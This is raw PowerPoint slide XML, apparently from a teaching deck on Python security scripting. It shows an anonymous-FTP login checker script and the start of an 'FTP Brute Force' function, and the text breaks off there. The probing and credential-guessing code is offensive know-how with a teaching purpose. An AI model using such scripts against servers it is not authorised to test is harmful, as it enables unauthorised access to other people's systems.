            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="669665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FTP Checking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>anonFTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    ftp = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftplib.FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('anonymous', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>test@test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1807621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393" y="200026"/>
            <a:ext cx="7787807" cy="6175750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/python3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t># usage: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>ftp.server.ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>import sys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftplib</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>anonFTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    ftp = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftplib.FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('anonymous', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>test@test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return True </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftpsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftpsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> + ": Checking anonymous FTP server status”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>anonFTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftpsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> is not False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  print("[+]" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftpsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> + " is an anonymous FTP server”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  print("[-]" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftpsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> + " is either offline or not an FTP server”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="814827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FTP Brute Force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’re already doing an anonymous FTP login check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>anonLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    ftp = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftplib.FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>anonymous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>test@test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    return True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3004025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FTP Brute Force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp_brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(hostname, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
